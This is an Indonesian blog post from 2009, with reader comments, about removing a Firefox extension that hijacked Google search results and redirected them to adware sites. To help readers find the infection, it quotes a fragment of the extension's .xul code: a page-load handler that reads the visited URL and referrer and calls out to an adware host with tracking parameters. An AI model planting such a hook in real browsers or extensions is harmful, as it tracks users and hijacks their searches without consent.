Membersihkan Browser Mozilla FF dari “penyakit” Google Search Link Redirection

Posted: March 30, 2009 in Tips n' Trik

Sudah beberapa hari ini saya merasa tidak nyaman menggunakan Google Search Engine, karena setiap kali melakukan pencarian pasti setiap link yang dibuka pasti dialihkan (redirect) ke situs lain.
Karena sudah sangat mengganggu akhirnya saya lakukan scanning dengan menggunakan Norton Corporate Antivirus, PCMAV Valkyrie, XoftSpy, dan Malwarebytes. Dengan menggunakan Malwarebytes terdapat beberapa file misterius yang merupakan rootkit/malware seneka.
Tapi setelah dinyatakan bersih masih saja dialihkan ke situs lain seperti clickchecktools[dot]com serta abcjmp[dot]com, sebelum itu jika dilihat pada loading bar bukan hanya memuat alamat google, tapi juga memuat alamat v1.adwarefeed[dot]com setiap mengeksekusi atau memindah halaman pencarian di google.
Karena pake software anti virus/malware/rootkit ngga’ kunjung mendapatkan hasil, akhirnya saya pake cara manual yaitu masuk ke C:\Program Files\Mozilla Firefox\extensions\.

Kemudian mencari file yang berekstensi .xul dan dibuka dengan menggunakan wordpad, setelah diteliti dari baris perbaris saya menemukan kode unik seperti yang tertera dibawah ini:

onPageLoad:
function(aEvent){
var doc = aEvent.originalTarget;
var loc = doc.location.href;
var ref = doc.referrer;
var keyword = ”;
var engine ;
var __d =http://v1.adwarefeed.com/ffjs.php?u=3893913796-746137067-813497703-839522115&a=303365&s=21&v=icv07030901ff&e=”;

Akhirnya ketemu juga penyakitnya, tanpa menunggu lama saya hapus sub folder pada folder extensions Mozilla yang berisi link diatas (nama foldernya misal seperti {CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA})
Setelah itu restart Mozilla dan dicoba beberapa kali melakukan pencarian dengan Google sudah tidak dialihkan ke situs lain lagi.

Comments
  1. wah…bagus banget infonya…buat nambah ilmu seorang anak 15 tahun yang baru mempelajari internet..

  2. thom says:

    Keren…
    Daripada susah susah make spyware remover🙂
    Kekekekee..

    Makasih ilmunya broo.. sorry baru bisa kunjungan balik🙂

  3. cecepswp says:

    Thx atas kunjungannya, s’moga bermanfaat🙂

  4. fetro says:

    ngemeng-ngemeng, banyak benar antivir mu bro? nggak pada bentrok tuh🙂

  5. annosmile says:

    nambah ilmu nih
    tapi saya masih pake opera
    browser favorit

  6. suwung says:

    duh sayang diriku gaptek

  7. properties says:

    wah malah baru tahu kalo ada yang bisa gitu

  8. Domba Gaul says:

    Kalo facebook di block, solusinya gimana?

  9. Bisa diakalin ya….. Baru tau. Bisa dicoba nih bang

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s